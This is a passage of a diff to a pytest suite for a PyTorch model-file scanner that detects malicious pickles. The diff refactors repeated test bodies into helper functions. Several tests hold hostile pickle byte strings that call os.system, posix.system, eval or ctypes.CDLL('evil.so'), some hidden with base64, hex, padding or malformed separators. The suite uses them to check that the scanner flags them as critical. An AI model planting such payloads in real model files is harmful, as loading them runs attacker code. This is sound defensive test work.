"archive/data/0" - for issue in result.issues + _assert_binary_literal_near_match( + tmp_path, ("referenced_headerless_binary_literal_near_match.pt"), (b"S'\x8c\x02ok\x94.'\n.") ) @@ -5062,20 +3857,7 @@ def test_pytorch_zip_discovery_routes_binary_pickle_after_raw_candidate_budget_g nested_pickle = b"\x80\x04cbuiltins\neval\n(S'1+1'\ntR." literal = (b"c" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + b"ZZZZ" + nested_pickle storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_binary_pickle_after_long_raw_candidate_budget_gap(tmp_path: Path) -> None: @@ -5085,20 +3867,7 @@ def test_pytorch_zip_discovery_routes_binary_pickle_after_long_raw_candidate_bud (b"c" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + (b"!" * 9_000) + nested_pickle ) storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_global_after_malformed_global_candidate(tmp_path: Path) -> None: @@ -5109,40 +3878,14 @@ def test_pytorch_zip_discovery_routes_global_after_malformed_global_candidate(tm + b"cctypes\nCDLL\n(S'evil.so'\ntR." ) storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_preserves_embedded_bytes_in_mixed_unicode_literal(tmp_path: Path) -> None: model_path = tmp_path / "referenced_mixed_unicode_embedded_bytes.pt" nested_pickle = b"\x80\x04\x8c\x02os\x94\x8c\x06system\x94\x93\x8c\x04true\x94\x85R." storage_blob = pickle.dumps("\u2603" + nested_pickle.decode("latin-1"), protocol=0) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_later_binary_pickle_after_benign_binary_decoy(tmp_path: Path) -> None: @@ -5157,20 +3900,7 @@ def test_pytorch_zip_discovery_routes_later_binary_pickle_after_benign_binary_de + nested_pickle ) storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_headerless_binary_pickle_after_budget_noise(tmp_path: Path) -> None: @@ -5178,20 +3908,7 @@ def test_pytorch_zip_discovery_routes_headerless_binary_pickle_after_budget_nois nested_pickle = b"\x8c\x02os\x8c\x06system\x93)R." literal = (b"c" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1)) + (b"!" * 100) + nested_pickle storage_blob = _proto0_string_literal(literal) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def _budget_exhausted_headerless_extension_literal() -> bytes: @@ -5235,20 +3952,7 @@ def test_pytorch_zip_discovery_routes_bytearray8_literal_after_trivial_prefix(tm model_path = tmp_path / "referenced_bytearray8_after_trivial_prefix.pt" encoded = base64.b64encode(b"cposix\nsystem\n)R.") storage_blob = b"N.\x96" + len(encoded).to_bytes(8, "little") + encoded + b"." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_extension_opcode_after_raw_candidate_budget_gap(tmp_path: Path) -> None: @@ -5277,40 +3981,15 @@ def test_pytorch_zip_discovery_routes_extension_opcode_after_raw_candidate_budge def test_pytorch_zip_discovery_skips_stack_global_without_operands_near_match(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_stack_global_without_operands_near_match.pt" - storage_blob = b"N.\x93.\x00\x00" - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert not any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues + _assert_binary_literal_near_match( + tmp_path, ("referenced_stack_global_without_operands_near_match.pt"), (b"N.\x93.\x00\x00") ) def test_pytorch_zip_discovery_scans_malformed_separator_before_security_pickle(tmp_path: Path) -> None: model_path = tmp_path / "referenced_malformed_separator_before_security_pickle.pt" storage_blob = b"N.!cposix\nsystem\n(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_malformed_separator_after_security_opcode_prefix(tmp_path: Path) -> None: @@ -5337,40 +4016,14 @@ def test_pytorch_zip_discovery_scans_encoded_pickle_after_malformed_separator(tm model_path = tmp_path / "referenced_encoded_pickle_after_malformed_separator.pt" nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") storage_blob = b"N.!S'" + nested_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_encoded_pickle_after_repeated_malformed_separator(tmp_path: Path) -> None: model_path = tmp_path / "referenced_encoded_pickle_after_repeated_malformed_separator.pt" nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") storage_blob = b"N.ZZS'" + nested_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_encoded_pickle_after_mixed_malformed_separators(tmp_path: Path) -> None: @@ -5457,20 +4110,7 @@ def test_pytorch_zip_discovery_scans_malformed_separator_after_benign_binary_can ) -> None: model_path = tmp_path / "referenced_malformed_separator_after_benign_binary_candidates.pt" storage_blob = b"N." + tail - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_after_long_malformed_separator_trusted_probe_prefix( @@ -5478,39 +4118,13 @@ def test_pytorch_zip_discovery_scans_after_long_malformed_separator_trusted_prob ) -> None: model_path = tmp_path / "referenced_long_malformed_separator_prefix_pickle.pt" storage_blob = b"N." + (b"\xff" * 4094) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_after_expanded_malformed_separator_prefix(tmp_path: Path) -> None: model_path = tmp_path / "referenced_expanded_malformed_separator_prefix_pickle.pt" storage_blob = b"N." + (b"\xff" * 65_536) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_reports_large_malformed_separator_tensor_noise_incomplete(tmp_path: Path) -> None: @@ -5554,44 +4168,16 @@ def test_pytorch_zip_discovery_routes_binunicode_literal_with_repeated_line_cont def test_pytorch_zip_discovery_skips_malformed_separator_tensor_noise_near_match(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_malformed_separator_tensor_noise.pt" - storage_blob = b"N." + (b"c" * 100) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) - - -def test_pytorch_zip_discovery_skips_large_proto0_global_like_tensor_noise(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_large_proto0_global_like_tensor_noise.pt" - storage_blob = b"N." + (b"c" * 100_000) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) - - -def test_pytorch_zip_discovery_skips_encoded_marker_density_scalar_tensor_noise(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_encoded_marker_density_scalar_tensor_noise.pt" - storage_blob = _proto0_string_literal(b"a" * 512) + _assert_malformed_separator_noise(tmp_path, ("referenced_malformed_separator_tensor_noise.pt"), (100)) + + +def test_pytorch_zip_discovery_skips_large_proto0_global_like_tensor_noise(tmp_path: Path) -> None: + _assert_malformed_separator_noise(tmp_path, ("referenced_large_proto0_global_like_tensor_noise.pt"), (100_000)) + + +def test_pytorch_zip_discovery_skips_encoded_marker_density_scalar_tensor_noise(tmp_path: Path) -> None: + model_path = tmp_path / "referenced_encoded_marker_density_scalar_tensor_noise.pt" + storage_blob = _proto0_string_literal(b"a" * 512) storage_blob += b" " * (-len(storage_blob) % 4) with zipfile.ZipFile(model_path, "w") as zip_file: zip_file.writestr("archive/version", "3\n") @@ -5610,13 +4196,9 @@ def test_pytorch_zip_discovery_skips_encoded_marker_density_scalar_tensor_noise( def test_pytorch_zip_trailing_candidate_raw_scan_bounds_invalid_marker_attempts( monkeypatch: pytest.MonkeyPatch, ) -> None: - call_count = 0 original = PyTorchZipScanner._has_security_relevant_pickle_opcode - def counted_has_security_relevant_pickle_opcode(sample: bytes) -> bool: - nonlocal call_count - call_count += 1 - return original(sample) + counted_has_security_relevant_pickle_opcode = create_autospec(original, side_effect=original) monkeypatch.setattr( PyTorchZipScanner, @@ -5631,7 +4213,10 @@ def counted_has_security_relevant_pickle_opcode(sample: bytes) -> bool: ) is False ) - assert call_count <= pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + assert ( + counted_has_security_relevant_pickle_opcode.call_count + <= pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + ) def test_pytorch_zip_trailing_candidate_raw_scan_fails_closed_after_candidate_budget() -> None: @@ -5990,59 +4575,20 @@ def test_pytorch_zip_discovery_routes_long_headerless_binbytes_storage(tmp_path: def test_pytorch_zip_discovery_routes_padded_headerless_byte_literal_storage(tmp_path: Path) -> None: model_path = tmp_path / "referenced_padded_headerless_byte_literal_storage.pt" storage_blob = b"C\x06benign." + (b" " * 5000) + b"cposix\nsystem\n)R." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_redundantly_padded_base64_literal_storage(tmp_path: Path) -> None: model_path = tmp_path / "referenced_redundantly_padded_base64_literal_storage.pt" encoded = base64.b64encode(b"cposix\nsystem\n)R.") + b"=" storage_blob = b"S'" + encoded + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_skips_direct_headerless_byte_literal_near_match(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_headerless_byte_literal_near_match.pt" - storage_blob = b"C\x06benign." - storage_blob += b"\x00" * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) - assert not any(check.details.get("pickle_filename") == "archive/data/0" for check in result.checks) + _assert_headerless_byte_near_match( + tmp_path, ("referenced_headerless_byte_literal_near_match.pt"), (b"C\x06benign."), (b"\x00") + ) def test_pytorch_zip_discovery_skips_impossible_headerless_binbytes_length(tmp_path: Path) -> None: @@ -6097,38 +4643,13 @@ def test_pytorch_zip_discovery_skips_headerless_binary_second_opcode_near_match( tmp_path: Path, storage_blob: bytes, ) -> None: - model_path = tmp_path / "referenced_headerless_binary_second_opcode_near_match.pt" - storage_blob += b"\x00" * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) - assert not any(check.details.get("pickle_filename") == "archive/data/0" for check in result.checks) + _assert_headerless_opcode_near_match( + tmp_path, storage_blob, ("referenced_headerless_binary_second_opcode_near_match.pt") + ) def test_pytorch_zip_discovery_skips_oversized_nul_padding_storage_near_match(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_oversized_nul_padding_tensor_noise.pt" - storage_blob = b"N." + (b"\x00" * 300_002) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + _assert_storage_padding_clean(tmp_path, ("referenced_oversized_nul_padding_tensor_noise.pt"), (b"\x00"), (300_002)) def test_pytorch_zip_discovery_scans_malicious_pickle_after_oversized_nul_padding(tmp_path: Path) -> None: @@ -6383,20 +4904,7 @@ def test_pytorch_zip_discovery_scans_whitespace_hex_nested_pickle_literal(tmp_pa model_path = tmp_path / "referenced_scalar_literal_hex_nested_pickle.pt" encoded = binascii.hexlify(b"cposix\nsystem\n)R.") storage_blob = _proto0_string_literal(encoded[:8] + b" " + encoded[8:]) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) @pytest.mark.parametrize("separator", [b"!", b"@"], ids=["bang", "at"]) @@ -6408,38 +4916,20 @@ def test_pytorch_zip_discovery_scans_punctuation_base64_nested_pickle_literal( encoded = base64.b64encode(b"cposix\nsystem\n)R.") punctuated = separator.join(encoded[index : index + 4] for index in range(0, len(encoded), 4)) storage_blob = _proto0_string_literal(punctuated) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_raw_nested_literal_candidates_fail_closed_after_budget( monkeypatch: pytest.MonkeyPatch, ) -> None: - calls = 0 - - def no_security_opcode(_candidate: bytes) -> bool: - nonlocal calls - calls += 1 - return False + no_security_opcode = create_autospec(lambda _candidate: False, return_value=False) monkeypatch.setattr(PyTorchZipScanner, "_has_security_relevant_pickle_opcode", staticmethod(no_security_opcode)) value = b"c" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + 1) assert PyTorchZipScanner._literal_value_has_raw_nested_security_pickle(value) is False - assert calls == pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + assert no_security_opcode.call_count == pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES def test_pytorch_zip_raw_nested_literal_routes_extension_operand_after_budget_exhaustion() -> None: @@ -6459,12 +4949,7 @@ def test_pytorch_zip_raw_nested_literal_preserves_text_marker_after_budget_exhau def test_pytorch_zip_structural_fallback_bounds_binary_opcode_candidates( monkeypatch: pytest.MonkeyPatch, ) -> None: - calls = 0 - - def no_binary_signal(_candidate: bytes, *, candidate_is_prefix: bool) -> bool: - nonlocal calls - calls += 1 - return False + no_binary_signal = create_autospec(lambda _candidate, *, candidate_is_prefix: False, return_value=False) monkeypatch.setattr( PyTorchZipScanner, @@ -6475,26 +4960,16 @@ def no_binary_signal(_candidate: bytes, *, candidate_is_prefix: bool) -> bool: value = b"\x8c\x00" * (pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + 10) assert PyTorchZipScanner._raw_nested_security_pickle_candidate_has_structural_signal(value) is True - assert calls == pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES + assert no_binary_signal.call_count == pytorch_zip_scanner_module._MAX_RAW_NESTED_PICKLE_CANDIDATES def test_pytorch_zip_discovery_skips_scalar_literal_raw_nested_near_match(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_scalar_literal_raw_nested_near_match.pt" - storage_blob = b"S'AAAAAAco\\x0asafe\\x0a)X.BBBB'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) - assert not any(check.details.get("pickle_filename") == "archive/data/0" for check in result.checks) + _assert_headerless_byte_near_match( + tmp_path, + ("referenced_scalar_literal_raw_nested_near_match.pt"), + (b"S'AAAAAAco\\x0asafe\\x0a)X.BBBB'\n."), + (b" "), + ) def test_pytorch_zip_discovery_scans_malformed_separator_unicode_literal_nested_pickle( @@ -6530,20 +5005,7 @@ def test_pytorch_zip_discovery_scans_comment_marker_split_at_trusted_probe_bound ) assert len(storage_prefix) == pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES storage_blob = storage_prefix + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_marks_repeated_trivial_streams_filling_expanded_probe_incomplete( @@ -6582,13 +5044,9 @@ def test_pytorch_zip_complete_stream_check_bounds_repeated_trivial_streams_after def test_pytorch_zip_trailing_candidate_consumes_repeated_trivial_streams_before_suffix_parse( monkeypatch: pytest.MonkeyPatch, ) -> None: - calls = 0 original = PyTorchZipScanner._trivial_complete_pickle_prefix_trailing - def counted_trivial_prefix_trailing(sample: bytes) -> bytes | None: - nonlocal calls - calls += 1 - return original(sample) + counted_trivial_prefix_trailing = create_autospec(original, side_effect=original) monkeypatch.setattr( PyTorchZipScanner, @@ -6597,7 +5055,7 @@ def counted_trivial_prefix_trailing(sample: bytes) -> bytes | None: ) assert PyTorchZipScanner._trailing_pickle_candidate_needs_more_bytes(b"N." * 32768) is False - assert calls == 0 + assert counted_trivial_prefix_trailing.call_count == 0 def test_pytorch_zip_discovery_scans_comment_prefixed_pickle_after_trivial_scalar_prefix( @@ -6605,20 +5063,7 @@ def test_pytorch_zip_discovery_scans_comment_prefixed_pickle_after_trivial_scala ) -> None: model_path = tmp_path / "referenced_scalar_prefix_comment_prefixed_pickle.pt" storage_blob = b"N.#" + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_comment_prefixed_pickle_after_many_trivial_streams( @@ -6626,20 +5071,7 @@ def test_pytorch_zip_discovery_scans_comment_prefixed_pickle_after_many_trivial_ ) -> None: model_path = tmp_path / "referenced_scalar_prefix_comment_many_trivial_streams_pickle.pt" 